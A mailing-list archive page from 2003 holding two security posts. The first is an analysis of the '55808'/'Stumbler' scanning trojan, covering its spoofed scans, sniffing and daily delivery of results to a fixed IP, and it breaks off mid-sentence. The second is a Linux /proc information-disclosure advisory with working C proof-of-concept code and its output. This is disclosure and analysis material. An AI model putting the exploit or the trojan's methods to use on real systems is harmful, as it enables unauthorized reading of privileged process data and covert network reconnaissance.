Intrusec 55808 Trojan Analysis

2003-06-21 Thread David J. Meltzer 
Intrusec Alert: 55808 Trojan Analysis

Initial Release: 6/19/03 4:30PM EDT
Latest Update: 6/19/03 11:13PM EDT

- Corrected analysis regarding use of sequence numbers to change IP
address.
- Added reference to alternate name "Stumbler" given to trojan by
Internet Security Systems subsequent to the release of Intrusec's
analysis.


Introduction:

Intrusec has completed an initial analysis of a trojan that appears to
be one of several that is responsible for generating substantial
scanning traffic across the Internet with a TCP window size of 55808.
The trojan we have isolated appears to match many of the characteristics
that others in the security community have reported for this trojan.
However, we do not believe that the specific trojan we have identified
is the sole source of the traffic generated, and do not know that it is
a primary source. 

The information we've been able to gather leads us to believe that the
trojan we have captured is not the original source of the 55808 traffic
that has been seen, but is rather a "copycat", created to mimic the
behavior of another trojan or worm. The behavior of this copycat appears
to be based on press releases, news articles, and mailing lists that
described its hypothetical behavior and known output. Nonetheless, this
copycat trojan appears to be actively deployed on systems across the
Internet and is something security professionals should be aware of.
Details contained in this analysis will be updated, and linked to linked
to numerous analyses that will be done by other security researchers, as
they become available. 

Please visit and link to http://www.intrusec.com/55808.html to receive
the latest 
information available regarding this trojan.  There is apt to be great
discussion about the nature of this "trojan" and whether in fact it is
accurately characterized as a trojan, backdoor, zombie, or worm. While
the specific binaries we have captured are probably described as a
trojan or zombie, there is no assurance that other variants of this
trojan may not be far more malicious in nature and contain worm or
backdoor functionality. We are referring to the trojan we have captured,
and the presumed other existing trojans generating similar traffic as
"55808 Trojans," and the specific binary we have analyzed as "55808
Trojan - Variant A." All discussion in our analysis section refers
specifically to the 'A' variant we have captured.  Internet Security
Systems subsequent to the release of this alert dubbed this "Stumbler",
and refers to this same trojan by that name.


Analysis:

This trojan aims to be a distributed port scanner whose presence is very
difficult to detect. It port scans random addresses across the IP
address space, with a random source address also spoofed. By spoofing
the source address, the trojan is able to avoid easy detection, but it
also means it can not receive the results of the TCP SYN that is sent.
However, since the trojan also sniffs the network it is on in
promiscuous mode, it is likely, over time, to pick up scans from other
installations of trojans that randomly selected a source address that
happened to be on its subnet. As the number of trojans installed across
the Internet grows, more spoofed packets will be sent out by each
trojan, and more of the spoofed source addresses will be captured by
other trojans. 

Each time a reply to a trojan is seen, indicating an open port has been
found, it is written to a file and saved. Daily, the trojan will then
deliver the list of open ports it recorded while sniffing to a file and
deliver that file to a predefined IP address.

In addition, a specially crafted packet can be sent to the subnet the
trojan is listening on which contains in its sequence number the IP
address the trojan should deliver the open port list to daily.  However,
in the current incarnations of this trojan this functionality appears to
be disabled.

Finally, the trojan contains a feature whereby if it fails to connect to
the IP address it is supposed to deliver its open ports list to, it will
automatically attempt to remove itself from the system.

The trojan we have identified has been a file named 'a' that resides in
/tmp/.../a on the filesystem. Its packet collection activity monitors
for any packet with a window size of 55808 and records all packets
matching that window size. The packet capture is written to its current
directory (/tmp/.../ typically) in a file named 'r'. 

There is a default IP address of 12.108.65.76 that the trojan attempts
to make a standard connection (not spoofed) to on TCP port 22 and
deliver the packet capture after it has been running for 24 hours,
however this appears to have been randomly selected as it is not an
active system on the Internet, and it is potentially dynamically
modifiable by a packet that can be sent to the trojan.

The trojan appears to contain some functionality to change the IP
address it delivers its packet captures to, but this functionality is
not operational in the troj

Linux /proc sensitive information disclosure

2003-06-21 Thread Paul Starzetz 
Hello,

attached a simple prrof of concept for the /proc filesystem disclosing 
sensitive information.

I noticed that opening an entry from /proc/self/ and keeping the file 
open while executing a setuid binary prevents the opened proc entry from 
changing the ownership from the initial user to the set-uid value. 
However I'm not very sure about the impact of this bug (feature), the 
attached code just reads the environment (which is per default mode 400).

The technique can not be applied to /proc/self/mem because the permision 
checks are made dynamically (the child must be ptraced etc.).

This is a sample output of the PoC:

[EMAIL PROTECTED]:~/dev/expl> ./procex

parent executing setuid
PING 127.0.0.1 (127.0.0.1) from 127.0.0.1 : 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.066 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.061 ms
child reads parent's proc:
PWD=/home/paul/..
Content of /proc/32353
ls: /proc/32353/cwd: Permission denied
ls: /proc/32353/root: Permission denied
ls: /proc/32353/exe: Permission denied
-r--r--r--1 root root0 Jun 20 14:47 cmdline
lrwxrwxrwx1 root root0 Jun 20 14:47 cwd
-r1 paul users   0 Jun 20 14:47 environ [*]
lrwxrwxrwx1 root root0 Jun 20 14:47 exe
[...]
-r--r--r--1 root root0 Jun 20 14:47 status
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.060 ms
--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% loss, time 1998ms
rtt min/avg/max/mdev = 0.060/0.062/0.066/0.007 ms
[*] as you can see here the ownership didn't change...

/ih

/
*   *
*   Linux /proc information disclosure PoC  *
*   by IhaQueR  *
*   *
/



#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 



static char buf[128];



void fatal(const char *msg)
{
printf("\n");
if (!errno) {
fprintf(stderr, "FATAL: %s\n", msg);
} else {
perror(msg);
}

printf("\n");
fflush(stdout);
fflush(stderr);
exit(129);
}


int main()
{
int fd, r;
char c;

sprintf(buf, "/proc/%d/environ", getpid());
fd = open(buf, O_RDONLY);
if (fd > 0) {
sprintf(buf, "/proc/%d", getpid());
if (fork()) {
printf("\nparent executing setuid\n");
fflush(stdout);
execl("/bin/ping", "ping", "-c", "3", "127.0.0.1", NULL);
fatal("execl");
} else {
sleep(1);
printf("\nchild reads parent's proc:\n");
fflush(stdout);
while (1) {
r = read(fd, &c, 1);
if (r <= 0)
break;
printf("%c", c);
}
printf("\n\nContent of %s\n", buf);
fflush(stdout);
execl("/bin/ls", "ls", "-l", buf, NULL);
}
} else
fatal("open proc");

printf("\n");
fflush(stdout);

return 0;
}